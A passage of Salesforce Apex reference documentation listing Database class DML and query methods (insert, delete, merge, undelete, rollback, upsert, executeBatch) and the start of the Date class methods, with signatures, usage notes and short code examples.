Adds an sObject, such as an individual account or contact, to your organization's data.
insert(sObject [], Boolean)
Adds one or more sObjects, such as individual accounts or contacts, to your organizations data.
insert(sObject, Database.DMLOptions)
Adds an sObject, such as an individual account or contact, to your organization's data.
insert(sObject[], Database.DMLOptions)
Adds an sObject, such as an individual account or contact, to your organization's data.
1387
Reference
Database Class
merge(sObject, Id)
Merges the specified duplicate record into the master sObject record of the same type, deleting the duplicate, and reparenting any
related records. Merges only accounts, contacts, or leads.
merge(sObject, sObject)
Merges the specified duplicate sObject record into the master sObject of the same type, deleting the duplicate, and reparenting any
related records.
merge(sObject, List<Id>)
Merges up to two records of the same sObject type into the master sObject record, deleting the others, and reparenting any related
records.
merge(sObject, List<SObject>)
Merges up to two records of the same object type into the master sObject record, deleting the others, and reparenting any related
records.
merge(sObject, Id, Boolean)
Merges the specified duplicate record into the master sObject record of the same type, optionally returning errors, if any, deleting
the duplicate, and reparenting any related records. Merges only accounts, contacts, or leads.
merge(sObject, sObject, Boolean)
Merges the specified duplicate sObject record into the master sObject of the same type, optionally returning errors, if any, deleting
the duplicate, and reparenting any related records.
merge(sObject, List<Id>, Boolean)
Merges up to two records of the same sObject type into the master sObject record, optionally returning errors, if any, deleting the
duplicates, and reparenting any related records.
merge(sObject, List<SObject>, Boolean)
Merges up to two records of the same object type into the master sObject record, optionally returning errors, if any, deleting the
duplicates, and reparenting any related records.
query(String)
Creates a dynamic SOQL query at runtime.
rollback(System.Savepoint)
Restores the database to the state specified by the savepoint variable. Any emails submitted since the last savepoint are also rolled
back and not sent.
setSavepoint()
Returns a savepoint variable that can be stored as a local variable, then used with the rollback method to restore the database
to that point.
undelete(sObject, Boolean)
Restores an existing sObject record, such as an individual account or contact, from your organization's Recycle Bin.
undelete(sObject [], Boolean)
Restores one or more existing sObject records, such as individual accounts or contacts, from your organizations Recycle Bin.
undelete(ID, Boolean)
Restores an existing sObject record, such as an individual account or contact, from your organization's Recycle Bin.
undelete(ID[], Boolean)
Restores one or more existing sObject records, such as individual accounts or contacts, from your organizations Recycle Bin.
update(sObject, Boolean)
Modifies an existing sObject record, such as an individual account or contact, in your organization's data.
1388
Reference
Database Class
convertLead(Database.LeadConvert, Boolean)
Converts a lead into an account and contact, as well as (optionally) an opportunity.
Signature
public static Database.LeadConvertResult convertLead(Database.LeadConvert leadToConvert,
Boolean opt_allOrNone)
Parameters
leadToConvert
Type: Database.LeadConvert
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.LeadConvertResult
Usage
The convertLead method accepts up to 100 LeadConvert objects.
Each executed convertLead method counts against the governor limit for DML statements.
convertLead(Database.LeadConvert[], Boolean)
Converts a list of LeadConvert objects into accounts and contacts, as well as (optionally) opportunities.
1389
Reference
Database Class
Signature
public static Database.LeadConvertResult[] convertLead(Database.LeadConvert[]
leadsToConvert, Boolean opt_allOrNone)
Parameters
leadsToConvert
Type: Database.LeadConvert[]
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.LeadConvertResult[]
Usage
The convertLead method accepts up to 100 LeadConvert objects.
Each executed convertLead method counts against the governor limit for DML statements.
countQuery(String)
Returns the number of records that a dynamic SOQL query would return when executed.
Signature
public static Integer countQuery(String query)
Parameters
query
Type: String
Return Value
Type: Integer
Usage
For more information, see Dynamic SOQL on page 165.
Each executed countQuery method counts against the governor limit for SOQL queries.
1390
Reference
Database Class
Example
String QueryString =
'SELECT count() FROM Account';
Integer i =
Database.countQuery(QueryString);
delete(SObject, Boolean)
Deletes an existing sObject record, such as an individual account or contact, from your organization's data.
Signature
public static Database.DeleteResult delete(SObject recordToDelete, Boolean opt_allOrNone)
Parameters
recordToDelete
Type: sObject
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.DeleteResult
Usage
delete is analogous to the delete() statement in the SOAP API.
Each executed delete method counts against the governor limit for DML statements.
delete(SObject[], Boolean)
Deletes a list of existing sObject records, such as individual accounts or contacts, from your organizations data.
Signature
public static Database.DeleteResult[] delete(SObject[] recordsToDelete, Boolean
opt_allOrNone)
Parameters
recordsToDelete
Type: sObject[]
opt_allOrNone
Type: Boolean
1391
Reference
Database Class
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.DeleteResult[]
Usage
delete is analogous to the delete() statement in the SOAP API.
Each executed delete method counts against the governor limit for DML statements.
Example
The following example deletes an account named 'DotCom':
Account[] doomedAccts =
[SELECT Id, Name FROM Account
WHERE Name = 'DotCom'];
Database.DeleteResult[] DR_Dels =
Database.delete(doomedAccts);
delete(ID, Boolean)
Deletes existing sObject records, such as individual accounts or contacts, from your organizations data.
Signature
public static Database.DeleteResult delete(ID recordID, Boolean opt_allOrNone)
Parameters
recordID
Type: ID
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.DeleteResult
Usage
delete is analogous to the delete() statement in the SOAP API.
Each executed delete method counts against the governor limit for DML statements.
1392
Reference
Database Class
delete(ID[], Boolean)
Deletes a list of existing sObject records, such as individual accounts or contacts, from your organizations data.
Signature
public static Database.DeleteResult[] delete(ID[] recordIDs, Boolean opt_allOrNone)
Parameters
recordIDs
Type: ID[]
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.DeleteResult[]
Usage
delete is analogous to the delete() statement in the SOAP API.
Each executed delete method counts against the governor limit for DML statements.
emptyRecycleBin(ID[])
Permanently deletes the specified records from the Recycle Bin.
Signature
public static Database.EmptyRecycleBinResult[] emptyRecycleBin(ID [] recordIds)
Parameters
recordIds
Type: ID[]
Return Value
Type: Database.EmptyRecycleBinResult[]
Usage
Note the following:
After records are deleted using this method they cannot be undeleted.
Only 10,000 records can be specified for deletion.
1393
Reference
Database Class
The logged in user can delete any record that he or she can query in their Recycle Bin, or the recycle bins of any subordinates. If the
logged in user has Modify All Data permission, he or she can query and delete records from any Recycle Bin in the organization.
Cascade delete record IDs should not be included in the list of IDs; otherwise an error occurs. For example, if an account record is
deleted, all related contacts, opportunities, contracts, and so on are also deleted. Only include the Id of the top level account. All
related records are automatically removed.
Deleted items are added to the number of items processed by a DML statement, and the method call is added to the total number
of DML statements issued. Each executed emptyRecycleBin method counts against the governor limit for DML statements.
emptyRecycleBin(sObject)
Permanently deletes the specified sObject from the Recycle Bin.
Signature
public static Database.EmptyRecycleBinResult emptyRecycleBin(sObject obj)
Parameters
obj
Type: sObject
Return Value
Type: Database.EmptyRecycleBinResult
Usage
Note the following:
After an sObject is deleted using this method it cannot be undeleted.
Only 10,000 sObjects can be specified for deletion.
The logged-in user can delete any sObject that he or she can query in their Recycle Bin, or the recycle bins of any subordinates. If
the logged-in user has Modify All Data permission, he or she can query and delete sObjects from any Recycle Bin in the organization.
Do not include an sObject that was deleted due to a cascade delete; otherwise an error occurs. For example, if an account is deleted,
all related contacts, opportunities, contracts, and so on are also deleted. Only include sObjects of the top level account. All related
sObjects are automatically removed.
Deleted items are added to the number of items processed by a DML statement, and the method call is added to the total number
of DML statements issued. Each executed emptyRecycleBin method counts against the governor limit for DML statements.
emptyRecycleBin(sObject[])
Permanently deletes the specified sObjects from the Recycle Bin.
Signature
public static Database.EmptyRecycleBinResult[] emptyRecycleBin(sObject[] listOfSObjects)
1394
Reference
Database Class
Parameters
listOfSObjects
Type: sObject[]
Return Value
Type: Database.EmptyRecycleBinResult[]
Usage
Note the following:
After an sObject is deleted using this method it cannot be undeleted.
Only 10,000 sObjects can be specified for deletion.
The logged-in user can delete any sObject that he or she can query in their Recycle Bin, or the recycle bins of any subordinates. If
the logged-in user has Modify All Data permission, he or she can query and delete sObjects from any Recycle Bin in the organization.
Do not include an sObject that was deleted due to a cascade delete; otherwise an error occurs. For example, if an account is deleted,
all related contacts, opportunities, contracts, and so on are also deleted. Only include sObjects of the top level account. All related
sObjects are automatically removed.
Deleted items are added to the number of items processed by a DML statement, and the method call is added to the total number
of DML statements issued. Each executed emptyRecycleBin method counts against the governor limit for DML statements.
executeBatch(Object)
Submits a batch Apex job for execution corresponding to the specified class.
Signature
public static ID executeBatch(Object batchClassObject)
Parameters
batchClassObject
Type: Object
An instance of a class that implements the Database.Batchable interface.
Return Value
Type: ID
The ID of the new batch job (AsyncApexJob).
Usage
When calling this method, Salesforce chunks the records returned by the start method of the batch class into batches of 200, and
then passes each batch to the execute method. Apex governor limits are reset for each execution of execute.
For more information, see Using Batch Apex on page 225.
1395
Reference
Database Class
executeBatch(Object, Integer)
Submits a batch Apex job for execution using the the specified class and scope.
Signature
public static ID executeBatch(Object batchClassObject, Integer scope)
Parameters
batchClassObject
Type: Object
An instance of a class that implements the Database.Batchable interface.
scope
Type: Integer
Number of records to be passed into the execute method for batch processing.
Return Value
Type: ID
The ID of the new batch job (AsyncApexJob).
Usage
The value for scope must be greater than 0.
If the start method of the batch class returns a Database.QueryLocator, the scope parameter of Database.executeBatch
can have a maximum value of 2,000. If set to a higher value, Salesforce chunks the records returned by the QueryLocator into smaller
batches of up to 200 records. If the start method of the batch class returns an iterable, the scope parameter value has no upper limit;
however, if you use a very high number, you may run into other limits.
Apex governor limits are reset for each execution of execute.
For more information, see Using Batch Apex on page 225.
Signature
public static Database.GetDeletedResult getDeleted(String sObjectType, Datetime
startDate, Datetime endDate)
Parameters
sObjectType
Type: String
The sObjectType argument is the sObject type name for which to get the deleted records, such as account or merchandise__c.
1396
Reference
Database Class
startDate
Type: Datetime
Start date and time of the deleted records time window.
endDate
Type: Datetime
End date and time of the deleted records time window.
Return Value
Type: Database.GetDeletedResult
Usage
Because the Recycle Bin holds records up to 15 days, results are returned for no more than 15 days previous to the day the call is executed
(or earlier if an administrator has purged the Recycle Bin).
Example
Database.GetDeletedResult r =
Database.getDeleted(
'Merchandise__c',
Datetime.now().addHours(-1),
Datetime.now());
getQueryLocator(sObject [])
Creates a QueryLocator object used in batch Apex or Visualforce.
Signature
public static Database. QueryLocator getQueryLocator(sObject [] listOfQueries)
Parameters
listOfQueries
Type: sObject []
Return Value
Type: Database.QueryLocator
Usage
You can't use getQueryLocator with any query that contains an aggregate function.
Each executed getQueryLocator method counts against the governor limit of 10,000 total records retrieved and the total number
of SOQL queries issued.
For more information, see Understanding Apex Managed Sharing, and IdeaStandardSetController Class.
1397
Reference
Database Class
getQueryLocator(String)
Creates a QueryLocator object used in batch Apex or Visualforce.
Signature
public static Database.QueryLocator getQueryLocator(String query)
Parameters
query
Type: String
Return Value
Type: Database.QueryLocator
Usage
You can't use getQueryLocator with any query that contains an aggregate function.
Each executed getQueryLocator method counts against the governor limit of 10,000 total records retrieved and the total number
of SOQL queries issued.
For more information, see Understanding Apex Managed Sharing, and StandardSetController Class.
Signature
public static Database.GetUpdatedResult getUpdated(String sobjectType, Datetime
startDate, Datetime endDate)
Parameters
sobjectType
Type: String
The sObjectType argument is the sObject type name for which to get the updated records, such as account or merchandise__c.
startDate
Type: Datetime
The startDate argument is the start date and time of the updated records time window.
endDate
Type: Datetime
The endDate argument is the end date and time of the updated records time window.
Return Value
Type: Database.GetUpdatedResult
1398
Reference
Database Class
Usage
The date range for the returned results is no more than 30 days previous to the day the call is executed.
Example
Database.GetUpdatedResult r =
Database.getUpdated(
'Merchandise__c',
Datetime.now().addHours(-1),
Datetime.now());
insert(sObject, Boolean)
Adds an sObject, such as an individual account or contact, to your organization's data.
Signature
public static Database.SaveResult insert(sObject recordToInsert, Boolean opt_allOrNone)
Parameters
recordToInsert
Type: sObject
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.SaveResult
Usage
insert is analogous to the INSERT statement in SQL.
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Each executed insert method counts against the governor limit for DML statements.
Signature
public static Database.SaveResult[] insert(sObject [] recordsToInsert, Boolean
opt_allOrNone)
1399
Reference
Database Class
Parameters
recordsToInsert
Type: sObject []
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.SaveResult[]
Usage
insert is analogous to the INSERT statement in SQL.
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Each executed insert method counts against the governor limit for DML statements.
Example
Example:
The following example inserts two accounts:
Account a =
new Account(name = 'Acme1');
Database.SaveResult[] lsr =
Database.insert(
new Account[]{a,
new Account(Name = 'Acme2')},
false);
insert(sObject, Database.DMLOptions)
Adds an sObject, such as an individual account or contact, to your organization's data.
Signature
public static Database.SaveResult insert(sObject recordToInsert, Database.DMLOptions
options)
Parameters
recordToInsert
Type: sObject
options
Type: Database.DMLOptions
1400
Reference
Database Class
The optional opt_DMLOptions parameter specifies additional data for the transaction, such as assignment rule information or
rollback behavior when errors occur during record insertions.
Return Value
Type: Database.SaveResult
Usage
insert is analogous to the INSERT statement in SQL.
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Each executed insert method counts against the governor limit for DML statements.
insert(sObject[], Database.DMLOptions)
Adds an sObject, such as an individual account or contact, to your organization's data.
Signature
public static Database.SaveResult insert(sObject[] recordToInsert, Database.DMLOptions
options)
Parameters
recordToInsert
Type: sObject[]
options
Type: Database.DMLOptions
The optional opt_DMLOptions parameter specifies additional data for the transaction, such as assignment rule information or
rollback behavior when errors occur during record insertions.
Return Value
Type: Database.SaveResult
Usage
insert is analogous to the INSERT statement in SQL.
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Each executed insert method counts against the governor limit for DML statements.
merge(sObject, Id)
Merges the specified duplicate record into the master sObject record of the same type, deleting the duplicate, and reparenting any
related records. Merges only accounts, contacts, or leads.
1401
Reference
Database Class
Signature
public static Database.MergeResult merge(sObject master, Id duplicate)
Parameters
master
Type: sObject
The master sObject record the duplicate record is merged into.
duplicate
Type: ID
The ID of the record to merge with the master. This record must be of the same sObject type as the master.
Return Value
Type: Database.MergeResult
Usage
Each executed merge method counts against the governor limit for DML statements.
merge(sObject, sObject)
Merges the specified duplicate sObject record into the master sObject of the same type, deleting the duplicate, and reparenting any
related records.
Signature
public static Database.MergeResult merge(sObject master, sObject duplicate)
Parameters
master
Type: sObject
The master sObject record the duplicate record is merged into.
duplicate
Type: sObject
The sObject record to merge with the master. This sObject must be of the same type as the master.
Return Value
Type: Database.MergeResult
Usage
Each executed merge method counts against the governor limit for DML statements.
1402
Reference
Database Class
merge(sObject, List<Id>)
Merges up to two records of the same sObject type into the master sObject record, deleting the others, and reparenting any related
records.
Signature
public static List<Database.MergeResult> merge(sObject master, List<Id> duplicates)
Parameters
master
Type: SObject
The master sObject record the other records are merged into.
duplicates
Type: List<Id>
A list of IDs of up to two records to merge with the master. These records must be of the same sObject type as the master.
Return Value
Type: List<Database.MergeResult>
Usage
Each executed merge method counts against the governor limit for DML statements.
merge(sObject, List<SObject>)
Merges up to two records of the same object type into the master sObject record, deleting the others, and reparenting any related
records.
Signature
public static List<Database.MergeResult> merge(sObject master, List<SObject> duplicates)
Parameters
master
Type: SObject
The master sObject record the other sObjects are merged into.
duplicates
Type: List<SObject>
A list of up to two sObject records to merge with the master. These sObjects must be of the same type as the master.
Return Value
Type: List<Database.MergeResult>
1403
Reference
Database Class
Usage
Each executed merge method counts against the governor limit for DML statements.
Signature
public static Database.MergeResult merge(sObject master, Id duplicate, Boolean
allOrNothing)
Parameters
master
Type: sObject
The master sObject record the duplicate record is merged into.
duplicate
Type: ID
The ID of the record to merge with the master. This record must be of the same sObject type as the master.
allOrNone
Type: Boolean
Set to false to return any errors encountered in this operation as part of the returned result. If set to true, this method throws
an exception if the operation fails. The default is true.
Return Value
Type: Database.MergeResult
Usage
Each executed merge method counts against the governor limit for DML statements.
Signature
public static Database.MergeResult merge(sObject master, sObject duplicate, Boolean
allOrNone)
Parameters
master
Type: sObject
1404
Reference
Database Class
Type: sObject
The sObject record to merge with the master. This sObject must be of the same type as the master.
allOrNone
Type: Boolean
Set to false to return any errors encountered in this operation as part of the returned result. If set to true, this method throws
an exception if the operation fails. The default is true.
Return Value
Type: Database.MergeResult
Usage
Each executed merge method counts against the governor limit for DML statements.
Signature
public static List<Database.MergeResult> merge(sObject master, List<Id> duplicates,
Boolean allOrNone)
Parameters
master
Type: SObject
The master sObject record the other records are merged into.
duplicates
Type: List<Id>
A list of IDs of up to two records to merge with the master. These records must be of the same sObject type as the master.
allOrNone
Type: Boolean
Set to false to return any errors encountered in this operation as part of the returned result. If set to true, this method throws
an exception if the operation fails. The default is true.
Return Value
Type: List<Database.MergeResult>
Usage
Each executed merge method counts against the governor limit for DML statements.
1405
Reference
Database Class
Signature
public static List<Database.MergeResult> merge(sObject master, List<SObject> duplicates,
Boolean allOrNone)
Parameters
master
Type: sObject
The master sObject record the other sObjects are merged into.
duplicates
Type: List<SObject>
A list of up to two sObject records to merge with the master. These sObjects must be of the same type as the master.
allOrNone
Type: Boolean
Set to false to return any errors encountered in this operation as part of the returned result. If set to true, this method throws
an exception if the operation fails. The default is true.
Return Value
Type: List<Database.MergeResult>
Usage
Each executed merge method counts against the governor limit for DML statements.
query(String)
Creates a dynamic SOQL query at runtime.
Signature
public static sObject[] query(String query)
Parameters
query
Type: String
Return Value
Type: sObject[]
1406
Reference
Database Class
Usage
This method can be used wherever a static SOQL query can be used, such as in regular assignment statements and for loops. Unlike
inline SOQL, fields in bind variables are not supported.
For more information, see Dynamic SOQL on page 165.
Each executed query method counts against the governor limit for SOQL queries.
rollback(System.Savepoint)
Restores the database to the state specified by the savepoint variable. Any emails submitted since the last savepoint are also rolled back
and not sent.
Signature
public static Void rollback(System.Savepoint sp)
Parameters
sp
Type: System.Savepoint
Return Value
Type: Void
Usage
Note the following:
Static variables are not reverted during a rollback. If you try to run the trigger again, the static variables retain the values from the
first run.
Each rollback counts against the governor limit for DML statements. You will receive a runtime error if you try to rollback the database
additional times.
The ID on an sObject inserted after setting a savepoint is not cleared after a rollback. Create new a sObject to insert after a rollback.
Attempting to insert the sObject using the variable created before the rollback fails because the sObject variable has an ID. Updating
or upserting the sObject using the same variable also fails because the sObject is not in the database and, thus, cannot be updated.
For an example, see Transaction Control.
setSavepoint()
Returns a savepoint variable that can be stored as a local variable, then used with the rollback method to restore the database to
that point.
Signature
public static System.Savepoint setSavepoint()
Return Value
Type: System.Savepoint
1407
Reference
Database Class
Usage
Note the following:
If you set more than one savepoint, then roll back to a savepoint that is not the last savepoint you generated, the later savepoint
variables become invalid. For example, if you generated savepoint SP1 first, savepoint SP2 after that, and then you rolled back
to SP1, the variable SP2 would no longer be valid. You will receive a runtime error if you try to use it.
References to savepoints cannot cross trigger invocations because each trigger invocation is a new trigger context. If you declare a
savepoint as a static variable then try to use it across trigger contexts, you will receive a run-time error.
Each savepoint you set counts against the governor limit for DML statements.
For an example, see Transaction Control.
undelete(sObject, Boolean)
Restores an existing sObject record, such as an individual account or contact, from your organization's Recycle Bin.
Signature
public static Database.UndeleteResult undelete(sObject recordToUndelete, Boolean
opt_allOrNone)
Parameters
recordToUndelete
Type: sObject
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.UndeleteResult
Usage
undelete is analogous to the UNDELETE statement in SQL.
Each executed undelete method counts against the governor limit for DML statements.
Signature
public static Database.UndeleteResult[] undelete(sObject [] recordsToUndelete, Boolean
opt_allOrNone)
1408
Reference
Database Class
Parameters
recordsToUndelete
Type: sObject []
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.UndeleteResult[]
Usage
undelete is analogous to the UNDELETE statement in SQL.
Each executed undelete method counts against the governor limit for DML statements.
Example
The following example restores all accounts named 'Trump'. The ALL ROWS keyword queries all rows for both top-level and aggregate
relationships, including deleted records and archived activities.
Account[] SavedAccts =
[SELECT Id, Name
FROM Account
WHERE Name = 'Trump' ALL ROWS];
Database.UndeleteResult[] UDR_Dels =
Database.undelete(SavedAccts);
undelete(ID, Boolean)
Restores an existing sObject record, such as an individual account or contact, from your organization's Recycle Bin.
Signature
public static Database.UndeleteResult undelete(ID recordID, Boolean opt_allOrNone)
Parameters
recordID
Type: ID
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
1409
Reference
Database Class
Return Value
Type: Database.UndeleteResult
Usage
undelete is analogous to the UNDELETE statement in SQL.
Each executed undelete method counts against the governor limit for DML statements.
undelete(ID[], Boolean)
Restores one or more existing sObject records, such as individual accounts or contacts, from your organizations Recycle Bin.
Signature
public static Database.UndeleteResult[] undelete(ID[] recordIDs, Boolean opt_allOrNone)
Parameters
RecordIDs
Type: ID[]
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.UndeleteResult[]
Usage
undelete is analogous to the UNDELETE statement in SQL.
Each executed undelete method counts against the governor limit for DML statements.
update(sObject, Boolean)
Modifies an existing sObject record, such as an individual account or contact, in your organization's data.
Signature
public static Database.SaveResult update(sObject recordToUpdate, Boolean opt_allOrNone)
Parameters
recordToUpdate
Type: sObject
1410
Reference
Database Class
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.SaveResult
Usage
update is analogous to the UPDATE statement in SQL.
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Each executed update method counts against the governor limit for DML statements.
Example
The following example updates the BillingCity field on a single account.
Account a = new Account(Name='SFDC');
insert(a);
Account myAcct =
[SELECT Id, Name, BillingCity
FROM Account WHERE Id = :a.Id];
myAcct.BillingCity = 'San Francisco';
Database.SaveResult SR =
Database.update(myAcct);
Signature
public static Database.SaveResult[] update(sObject[] recordsToUpdate, Boolean
opt_allOrNone)
Parameters
recordsToUpdate
Type: sObject []
opt_allOrNone
Type: Boolean
1411
Reference
Database Class
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.SaveResult[]
Usage
update is analogous to the UPDATE statement in SQL.
Each executed update method counts against the governor limit for DML statements.
update(sObject, Database.DmlOptions)
Modifies an existing sObject record, such as an individual account or contact, in your organization's data.
Signature
public static Database.SaveResult update(sObject recordToUpdate, Database.DmlOptions
options)
Parameters
recordToUpdate
Type: sObject
options
Type: Database.DMLOptions
The optional opt_DMLOptions parameter specifies additional data for the transaction, such as assignment rule information or
rollback behavior when errors occur during record insertions.
Return Value
Type: Database.SaveResult
Usage
update is analogous to the UPDATE statement in SQL.
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Each executed update method counts against the governor limit for DML statements.
1412
Reference
Database Class
Signature
public static Database.SaveResult[] update(sObject[] recordsToUpdate, Database.DMLOptions
options)
Parameters
recordsToUpdate
Type: sObject []
options
Type: Database.DMLOptions
The optional opt_DMLOptions parameter specifies additional data for the transaction, such as assignment rule information or
rollback behavior when errors occur during record insertions.
Return Value
Type: Database.SaveResult[]
Usage
update is analogous to the UPDATE statement in SQL.
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Each executed update method counts against the governor limit for DML statements.
Signature
public static Database.UpsertResult upsert(sObject recordToUpsert, Schema.SObjectField
external_ID_Field, Boolean opt_allOrNone)
Parameters
recordToUpsert
Type: sObject
external_ID_Field
Type: Schema.SObjectField
The External_ID_Field is of type Schema.SObjectField, that is, a field token. Find the token for the field by using the fields
special method. For example, Schema.SObjectField f = Account.Fields.MyExternalId.
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
1413
Reference
Date Class
Return Value
Type: Database.UpsertResult
Usage
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Each executed upsert method counts against the governor limit for DML statements.
Signature
public static Database.UpsertResult[] upsert(sObject [] recordsToUpsert,
Schema.SObjectField External_ID_Field, Boolean opt_allOrNone)
Parameters
recordsToUpsert
Type: sObject []
External_ID_Field
Type: Schema.SObjectField
The External_ID_Field is of type Schema.SObjectField, that is, a field token. Find the token for the field by using the fields
special method. For example, Schema.SObjectField f = Account.Fields.MyExternalId.
opt_allOrNone
Type: Boolean
The optional opt_allOrNone parameter specifies whether the operation allows partial success. If you specify false for this
parameter and a record fails, the remainder of the DML operation can still succeed. This method returns a result object that can be
used to verify which records succeeded, which failed, and why.
Return Value
Type: Database.UpsertResult[]
Usage
Apex classes and triggers saved (compiled) using API version 15.0 and higher produce a runtime error if you assign a String value that
is too long for the field.
Each executed upsert method counts against the governor limit for DML statements.
Date Class
Contains methods for the Date primitive data type.
1414
Reference
Date Class
Namespace
System
Usage
For more information on Dates, see Primitive Data Types on page 26.
Date Methods
The following are methods for Date.
IN THIS SECTION:
addDays(Integer)
Adds the specified number of addlDays to a Date.
addMonths(Integer)
Adds the specified number of addlMonths to a Date
addYears(Integer)
Adds the specified number of addlYears to a Date
day()
Returns the day-of-month component of a Date.
dayOfYear()
Returns the day-of-year component of a Date.
daysBetween(Date)
Returns the number of days between the Date that called the method and the specified date.
daysInMonth(Integer, Integer)
Returns the number of days in the month for the specified year and month (1=Jan).
format()
Returns the Date as a string using the locale of the context user
isLeapYear(Integer)
Returns true if the specified year is a leap year.
isSameDay(Date)
Returns true if the Date that called the method is the same as the specified date.
month()
Returns the month component of a Date (1=Jan).
monthsBetween(Date)
Returns the number of months between the Date that called the method and the specified date, ignoring the difference in dates.
newInstance(Integer, Integer, Integer)
Constructs a Date from Integer representations of the year, month (1=Jan), and day.
parse(String)
Constructs a Date from a String. The format of the String depends on the local date format.
1415
Reference
Date Class
today()
Returns the current date in the current user's time zone.
toStartOfMonth()
Returns the first of the month for the Date that called the method.
toStartOfWeek()
Returns the start of the week for the Date that called the method, depending on the context user's locale.
valueOf(String)
Returns a Date that contains the value of the specified String.
valueOf(Object)
Converts the specified history tracking field value to a Date.
year()
Returns the year component of a Date
addDays(Integer)
Adds the specified number of addlDays to a Date.
Signature
public Date addDays(Integer addlDays)
Parameters
addlDays
Type: Integer
Return Value
Type: Date
Example
Date myDate = Date.newInstance(1960, 2, 17);
Date newDate = mydate.addDays(2);
addMonths(Integer)
Adds the specified number of addlMonths to a Date
Signature
public Date addMonths(Integer addlMonths)
Parameters
addlMonths
Type: Integer
1416
Reference
Date Class
Return Value
Type: Date
Example
date myDate = date.newInstance(1990, 11, 21);
date newDate = myDate.addMonths(3);
date expectedDate = date.newInstance(1991, 2, 21);
system.assertEquals(expectedDate, newDate);
addYears(Integer)
Adds the specified number of addlYears to a Date
Signature
public Date addYears(Integer addlYears)
Parameters
addlYears
Type: Integer
Return Value
Type: Date
Example
date myDate = date.newInstance(1983, 7, 15);
date newDate = myDate.addYears(2);
date expectedDate = date.newInstance(1985, 7, 15);
system.assertEquals(expectedDate, newDate);
day()
Returns the day-of-month component of a Date.
Signature
public Integer day()
Return Value
Type: Integer
1417
Reference
Date Class
Example
date myDate = date.newInstance(1989, 4, 21);
Integer day = myDate.day();
system.assertEquals(21, day);
dayOfYear()
Returns the day-of-year component of a Date.
Signature
public Integer dayOfYear()
Return Value
Type: Integer
Example
date myDate = date.newInstance(1998, 10, 21);
Integer day = myDate.dayOfYear();
system.assertEquals(294, day);
daysBetween(Date)
Returns the number of days between the Date that called the method and the specified date.
Signature
public Integer daysBetween(Date compDate)
Parameters
compDate
Type: Date
Return Value
Type: Integer
Usage
If the Date that calls the method occurs after the compDate, the return value is negative.
Example
Date startDate = Date.newInstance(2008, 1, 1);
Date dueDate = Date.newInstance(2008, 1, 30);
Integer numberDaysDue = startDate.daysBetween(dueDate);
1418
Reference
Date Class
daysInMonth(Integer, Integer)
